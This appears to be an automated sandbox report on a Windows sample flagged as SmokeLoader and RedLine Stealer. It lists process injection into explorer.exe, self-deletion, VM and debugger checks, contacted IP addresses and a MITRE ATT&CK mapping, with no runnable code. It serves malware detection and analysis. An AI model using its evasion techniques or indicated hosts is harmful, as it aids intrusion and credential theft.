Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290

Source: 1HGXcC63iu.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: 1HGXcC63iu.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: scjabht.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/2@3/2

Source: C:\Users\user\Desktop\1HGXcC63iu.exe

Code function: 0_2_02DD03D8 CreateToolhelp32Snapshot,Module32First,

0_2_02DD03D8

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\scjabht

Jump to behavior

Source: 1HGXcC63iu.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1HGXcC63iu.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1HGXcC63iu.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\1HGXcC63iu.exe "C:\Users\user\Desktop\1HGXcC63iu.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\scjabht C:\Users\user\AppData\Roaming\scjabht

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\1HGXcC63iu.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Unpacked PE file: 0.2.1HGXcC63iu.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.jekin:W;.zidisi:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\scjabht	Unpacked PE file: 5.2.scjabht.400000.0.unpack .text:ER;.rdata:R;.data:W;.jekin:W;.zidisi:W;.rsrc:R; vs .text:EW;

Source: 1HGXcC63iu.exe	Static PE information: section name: .jekin
Source: 1HGXcC63iu.exe	Static PE information: section name: .zidisi
Source: scjabht.1.dr	Static PE information: section name: .jekin
Source: scjabht.1.dr	Static PE information: section name: .zidisi

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_02D91540 pushad ; ret	0_2_02D91550
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_02DD21D4 push B63524ADh; retn 001Fh	0_2_02DD220B
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_02DD2CD1 pushfd ; iretd	0_2_02DD2CD2
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_02DD3E31 push esp; ret	0_2_02DD3E33
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_02B71540 pushad ; ret	5_2_02B71550
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_02DA4789 push esp; ret	5_2_02DA478B
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_02DA3629 pushfd ; iretd	5_2_02DA362A
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_02DA2B2C push B63524ADh; retn 001Fh	5_2_02DA2B63

Source: 1HGXcC63iu.exe	Static PE information: section name: .text entropy: 7.517270263050042
Source: scjabht.1.dr	Static PE information: section name: .text entropy: 7.517270263050042

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\scjabht

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\scjabht

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\1hgxcc63iu.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\scjabht:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\scjabht	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\scjabht	API/Special instruction interceptor: Address: 7FFE2220D584

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 436	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1107	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 832	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3837	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 878	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 872	Jump to behavior

Source: C:\Windows\explorer.exe TID: 7356	Thread sleep count: 436 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7364	Thread sleep count: 1107 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7364	Thread sleep time: -110700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7360	Thread sleep count: 832 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7360	Thread sleep time: -83200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7724	Thread sleep count: 299 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7732	Thread sleep count: 327 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7732	Thread sleep time: -32700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7728	Thread sleep count: 287 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7364	Thread sleep count: 3837 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7364	Thread sleep time: -383700s >= -30000s	Jump to behavior

Source: explorer.exe, 00000001.00000000.1763888567.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1763031463.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1763031463.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1763888567.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1759297715.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1763888567.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1763031463.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1763888567.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1760930928.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1763031463.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1759297715.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1759297715.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\1HGXcC63iu.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\1HGXcC63iu.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_02D90D90 mov eax, dword ptr fs:[00000030h]	0_2_02D90D90
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_02D9092B mov eax, dword ptr fs:[00000030h]	0_2_02D9092B
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_02DCFCB5 push dword ptr fs:[00000030h]	0_2_02DCFCB5
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_02B70D90 mov eax, dword ptr fs:[00000030h]	5_2_02B70D90
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_02B7092B mov eax, dword ptr fs:[00000030h]	5_2_02B7092B
Source: C:\Users\user\AppData\Roaming\scjabht	Code function: 5_2_02DA060D push dword ptr fs:[00000030h]	5_2_02DA060D

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: scjabht.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 58.151.148.90 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.161.95.103 80			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Thread created: C:\Windows\explorer.exe EIP: 13419A8			Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Thread created: unknown EIP: 33E19A8			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\scjabht	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000001.00000000.1760721422.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1759570525.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1763031463.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1759570525.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1759297715.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1759570525.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1759570525.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\1HGXcC63iu.exe

Code function: 0_2_00417620 InterlockedExchangeAdd,ReadConsoleA,FindAtomW,GetConsoleFontSize,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,LoadLibraryA,InterlockedDecrement,

0_2_00417620

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	411 Security Software Discovery	Remote Services	Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1HGXcC63iu.exe	34%	ReversingLabs
1HGXcC63iu.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\scjabht	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\scjabht	34%	ReversingLabs

Source	Detection	Scanner	Label
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://aka.ms/Vh5j3k	0%	URL Reputation	safe
